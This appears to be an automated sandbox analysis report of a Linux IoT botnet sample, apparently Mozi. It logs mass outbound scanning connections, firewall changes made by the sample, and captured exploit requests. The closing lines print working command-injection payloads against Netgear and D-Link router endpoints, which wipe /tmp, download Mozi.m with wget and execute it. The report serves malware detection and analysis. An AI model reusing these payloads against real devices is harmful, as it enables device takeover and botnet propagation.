Source: global traffic TCP traffic: 192.168.2.20:51003 -> 74.210.56.125:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 113.24.69.141:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 144.65.254.202:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 217.86.72.178:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 212.86.101.169:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 156.167.187.20:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 110.180.211.39:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 105.250.71.183:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 113.117.19.31:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 190.79.231.15:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 216.51.208.52:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 219.250.235.42:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 101.228.8.80:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 188.156.60.139:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 20.53.214.183:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 109.102.41.71:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 38.185.158.237:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 161.185.182.176:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 155.94.214.223:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 171.229.255.155:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 59.170.49.101:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 76.18.135.232:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 87.46.40.109:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 194.99.193.132:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.139.243.212:2323
Source: global traffic TCP traffic: 192.168.2.20:55946 -> 204.109.84.136:81
Source: global traffic TCP traffic: 192.168.2.20:35348 -> 31.193.226.180:8080
Source: global traffic TCP traffic: 192.168.2.20:54052 -> 44.10.103.216:5555
Source: global traffic TCP traffic: 192.168.2.20:57812 -> 93.181.246.124:5555
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 154.6.180.223:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 141.139.80.101:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 2.230.195.56:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 223.97.173.137:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 217.240.242.190:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 203.83.23.203:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 79.208.167.77:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 42.145.28.245:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 65.31.148.132:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 47.122.79.104:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 65.242.108.69:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 112.119.61.98:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 41.49.78.125:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 195.230.69.221:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 63.52.115.246:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 126.30.13.96:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 105.77.104.149:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 18.230.18.46:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 2.244.147.91:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 185.172.74.196:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 216.145.209.20:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 17.126.4.235:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 121.28.54.241:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 9.244.15.80:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 44.18.123.183:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 169.152.233.0:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 100.141.74.188:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 118.236.95.38:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 178.202.58.218:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 76.193.220.157:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 92.20.133.175:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 102.142.214.179:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 88.238.140.155:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 97.150.200.170:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 180.170.49.199:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 164.164.43.169:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 114.246.247.40:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 204.33.185.101:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 85.191.251.134:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 212.132.188.177:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 218.32.181.216:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 110.253.81.237:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 162.95.29.118:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 70.202.218.130:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 213.195.7.12:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 57.43.198.84:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 84.54.89.100:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 86.87.253.62:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 195.112.142.130:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 91.159.184.30:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 79.73.229.27:2323
Source: global traffic TCP traffic: 192.168.2.20:55758 -> 29.166.118.161:52869
Source: global traffic TCP traffic: 192.168.2.20:47432 -> 98.165.182.239:37215
Source: global traffic TCP traffic: 192.168.2.20:47526 -> 55.39.75.135:8443
Source: global traffic TCP traffic: 192.168.2.20:54462 -> 27.51.109.17:5555
Source: global traffic TCP traffic: 192.168.2.20:40436 -> 35.162.94.106:8080
Source: global traffic TCP traffic: 192.168.2.20:54238 -> 140.140.91.170:8443
Source: global traffic TCP traffic: 192.168.2.20:34834 -> 25.158.113.102:49152
Source: global traffic TCP traffic: 192.168.2.20:34392 -> 6.106.120.182:81
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 106.127.147.213:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 176.92.243.205:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 34.128.35.111:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 193.107.186.95:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 115.120.194.236:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 20.118.133.18:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 149.239.53.87:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 156.220.244.53:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 208.111.56.155:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 57.252.155.151:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 152.239.97.46:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 152.221.34.124:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 119.64.213.236:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 92.124.231.59:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 146.6.49.32:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 73.212.135.84:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 114.5.151.204:2323
Source: global traffic TCP traffic: 192.168.2.20:52256 -> 43.42.84.127:8443
Source: global traffic TCP traffic: 192.168.2.20:45708 -> 77.173.227.171:8080
Source: global traffic TCP traffic: 192.168.2.20:43850 -> 61.143.240.243:8080
Source: global traffic TCP traffic: 192.168.2.20:36238 -> 101.33.206.177:8080
Source: global traffic TCP traffic: 192.168.2.20:50218 -> 63.168.39.202:52869
Source: global traffic TCP traffic: 192.168.2.20:38574 -> 7.252.25.102:52869
Source: global traffic TCP traffic: 192.168.2.20:47766 -> 165.183.156.14:37215
Source: global traffic TCP traffic: 192.168.2.20:44144 -> 99.222.192.3:49152
Source: global traffic TCP traffic: 192.168.2.20:52860 -> 97.72.143.47:52869
Source: global traffic TCP traffic: 192.168.2.20:54286 -> 142.89.68.59:52869
Source: global traffic TCP traffic: 192.168.2.20:40208 -> 83.101.228.252:7574
Source: global traffic TCP traffic: 192.168.2.20:50208 -> 189.28.141.200:5555
Source: global traffic TCP traffic: 192.168.2.20:46134 -> 137.41.148.60:7574
Source: global traffic TCP traffic: 192.168.2.20:32854 -> 38.79.244.233:8080
Source: global traffic TCP traffic: 192.168.2.20:34252 -> 83.191.87.167:49152
Source: global traffic TCP traffic: 192.168.2.20:55768 -> 174.204.143.88:81
Source: global traffic TCP traffic: 192.168.2.20:50406 -> 55.112.46.169:8080
Source: global traffic TCP traffic: 192.168.2.20:41968 -> 174.242.148.233:49152
Source: global traffic TCP traffic: 192.168.2.20:33648 -> 182.32.81.51:7574
Source: global traffic TCP traffic: 192.168.2.20:39742 -> 214.19.91.180:8080
Source: global traffic TCP traffic: 192.168.2.20:41504 -> 28.8.96.182:8443
Source: global traffic TCP traffic: 192.168.2.20:48764 -> 211.150.15.80:8080
Source: global traffic TCP traffic: 192.168.2.20:50900 -> 67.222.221.70:8080
Source: global traffic TCP traffic: 192.168.2.20:60388 -> 186.4.165.144:8080
Source: global traffic TCP traffic: 192.168.2.20:60972 -> 63.80.240.64:49152
Source: global traffic TCP traffic: 192.168.2.20:44482 -> 20.119.144.2:52869
Source: global traffic TCP traffic: 192.168.2.20:36244 -> 71.204.5.240:49152
Source: global traffic TCP traffic: 192.168.2.20:45864 -> 53.165.88.238:8443
Source: global traffic TCP traffic: 192.168.2.20:44920 -> 99.127.24.157:37215
Source: global traffic TCP traffic: 192.168.2.20:53988 -> 211.121.75.90:8080
Source: global traffic TCP traffic: 192.168.2.20:52446 -> 106.219.59.104:81
Source: global traffic TCP traffic: 192.168.2.20:52648 -> 184.241.148.254:5555
Source: global traffic TCP traffic: 192.168.2.20:39806 -> 92.242.40.195:81
Source: global traffic TCP traffic: 192.168.2.20:49890 -> 155.6.95.108:8443
Source: global traffic TCP traffic: 192.168.2.20:33156 -> 124.236.254.90:37215
Source: global traffic TCP traffic: 192.168.2.20:40492 -> 141.206.254.140:8080
Source: global traffic TCP traffic: 192.168.2.20:36596 -> 52.240.164.145:37215
Source: global traffic TCP traffic: 192.168.2.20:49468 -> 187.78.60.235:49152
Source: global traffic TCP traffic: 192.168.2.20:40406 -> 29.179.230.224:5555
Source: global traffic TCP traffic: 192.168.2.20:38360 -> 193.228.21.18:8080
Source: global traffic TCP traffic: 192.168.2.20:43302 -> 193.170.193.163:8080
Source: global traffic TCP traffic: 192.168.2.20:33462 -> 198.192.88.15:49152
Source: global traffic TCP traffic: 192.168.2.20:41862 -> 46.2.142.178:8080
Source: global traffic TCP traffic: 192.168.2.20:59876 -> 211.157.99.239:8080
Source: global traffic TCP traffic: 192.168.2.20:47290 -> 120.5.123.53:5555
Source: global traffic TCP traffic: 192.168.2.20:60080 -> 92.116.223.234:8080
Source: global traffic TCP traffic: 192.168.2.20:56766 -> 202.114.86.56:8080
Source: global traffic TCP traffic: 192.168.2.20:44910 -> 149.240.175.109:52869
Source: global traffic TCP traffic: 192.168.2.20:41390 -> 138.192.249.226:52869
Source: global traffic TCP traffic: 192.168.2.20:39314 -> 81.68.199.130:5555
Source: global traffic TCP traffic: 192.168.2.20:57720 -> 137.139.2.130:5555
Source: global traffic TCP traffic: 192.168.2.20:36136 -> 139.199.14.195:8443
Source: global traffic TCP traffic: 192.168.2.20:50296 -> 95.157.19.163:49152
Source: global traffic TCP traffic: 192.168.2.20:53144 -> 70.67.151.179:7574
Source: global traffic TCP traffic: 192.168.2.20:41754 -> 200.28.173.176:5555
Source: global traffic TCP traffic: 192.168.2.20:37848 -> 120.93.77.91:8443
Source: global traffic TCP traffic: 192.168.2.20:55310 -> 53.12.77.94:49152
Source: global traffic TCP traffic: 192.168.2.20:36798 -> 176.248.47.153:49152
Source: global traffic TCP traffic: 192.168.2.20:33678 -> 130.119.213.235:8080
Source: global traffic TCP traffic: 192.168.2.20:44870 -> 113.11.182.35:81
Source: global traffic TCP traffic: 192.168.2.20:56000 -> 2.138.198.216:8080
Source: global traffic TCP traffic: 192.168.2.20:47370 -> 3.86.100.243:37215
Source: global traffic TCP traffic: 192.168.2.20:53480 -> 217.142.133.66:37215
Source: global traffic TCP traffic: 192.168.2.20:34236 -> 140.231.98.112:8080
Source: global traffic TCP traffic: 192.168.2.20:50338 -> 215.249.79.198:8080
Source: global traffic TCP traffic: 192.168.2.20:34044 -> 63.182.159.18:8080
Source: global traffic TCP traffic: 192.168.2.20:56914 -> 83.8.62.47:52869
Source: global traffic TCP traffic: 192.168.2.20:55952 -> 191.248.194.68:49152
Source: global traffic TCP traffic: 192.168.2.20:59852 -> 26.39.204.248:8443
Source: global traffic TCP traffic: 192.168.2.20:50364 -> 132.182.225.98:8080
Source: global traffic TCP traffic: 192.168.2.20:34340 -> 61.137.14.142:8443
Source: global traffic TCP traffic: 192.168.2.20:49066 -> 181.203.100.36:8080
Source: global traffic TCP traffic: 192.168.2.20:55552 -> 106.14.60.18:8443
Source: global traffic TCP traffic: 192.168.2.20:33890 -> 162.136.172.41:81
Source: global traffic TCP traffic: 192.168.2.20:54628 -> 41.155.207.183:5555
Source: global traffic TCP traffic: 192.168.2.20:34408 -> 99.148.201.126:8443
Source: global traffic TCP traffic: 192.168.2.20:54248 -> 190.192.94.182:5555
Source: global traffic TCP traffic: 192.168.2.20:52354 -> 92.141.22.32:8080
Source: global traffic TCP traffic: 192.168.2.20:36158 -> 43.93.231.189:81
Source: global traffic TCP traffic: 192.168.2.20:53898 -> 21.188.95.234:8080
Source: global traffic TCP traffic: 192.168.2.20:37272 -> 85.195.54.139:37215
Source: global traffic TCP traffic: 192.168.2.20:54602 -> 21.127.188.168:81
Source: global traffic TCP traffic: 192.168.2.20:60226 -> 133.215.160.216:81
Source: global traffic TCP traffic: 192.168.2.20:47520 -> 165.101.122.42:81
Source: global traffic TCP traffic: 192.168.2.20:46422 -> 198.125.156.213:81
Source: global traffic TCP traffic: 192.168.2.20:57890 -> 116.155.23.65:52869
Source: global traffic TCP traffic: 192.168.2.20:46796 -> 24.54.15.164:7574
Source: global traffic TCP traffic: 192.168.2.20:43308 -> 2.158.179.66:37215
Source: global traffic TCP traffic: 192.168.2.20:58486 -> 74.194.107.251:8080
Source: global traffic TCP traffic: 192.168.2.20:45926 -> 94.230.220.30:5555
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 119.209.23.112:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 102.176.178.224:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 199.69.235.21:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 158.92.202.121:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 122.243.254.61:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 144.63.116.58:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 108.192.176.65:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 108.153.206.152:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 103.232.41.84:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 87.76.34.106:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 44.46.34.202:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 98.200.244.150:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 8.133.238.164:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 13.197.37.37:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 119.18.92.1:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 75.1.214.251:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 212.239.243.44:2323
Source: global traffic TCP traffic: 192.168.2.20:56782 -> 136.44.214.227:8080
Source: global traffic TCP traffic: 192.168.2.20:40440 -> 123.30.132.60:37215
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 180.87.46.7:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 194.76.167.240:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 19.163.225.60:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 41.66.166.102:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 57.39.61.233:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 181.44.194.250:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 65.219.26.223:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 108.207.211.243:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 223.255.156.91:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 188.89.65.27:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 47.246.174.228:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 104.54.87.43:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 107.145.6.139:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 212.50.67.118:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 68.103.55.168:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 124.207.8.18:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 198.184.153.233:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 100.209.152.180:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 121.220.162.59:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 107.33.123.182:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 170.146.44.71:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 139.210.220.124:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 184.234.20.63:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 45.223.99.28:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 154.86.108.206:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 20.202.173.70:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 217.188.58.175:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 61.46.241.38:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 153.116.132.166:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 104.222.148.240:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 217.221.166.38:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 70.6.244.64:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 19.18.50.247:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 75.137.161.83:2323
Source: global traffic TCP traffic: 192.168.2.20:57876 -> 71.40.128.63:49152
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 36.6.47.186:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 5.71.245.186:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 209.37.10.223:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 147.148.65.25:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 194.207.70.113:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 182.24.155.194:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 70.135.20.121:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 91.180.230.147:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 202.221.1.28:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 96.50.197.214:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 42.56.59.180:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 203.213.20.163:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 91.244.32.53:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 186.81.247.159:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 119.202.144.95:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 119.173.29.245:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 9.172.43.63:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 8.208.36.68:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 180.52.239.233:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 203.70.165.212:2323
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4616) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4650) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4653) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4690) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4716) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4736) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4748) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4796) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4805) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4829) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4878) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4906) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4926) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4931) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4947) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4974) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5000) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5025) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5034) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5057) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5087) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5117) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5120) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5127) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5152) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5182) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5231) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5234) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.5.104.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 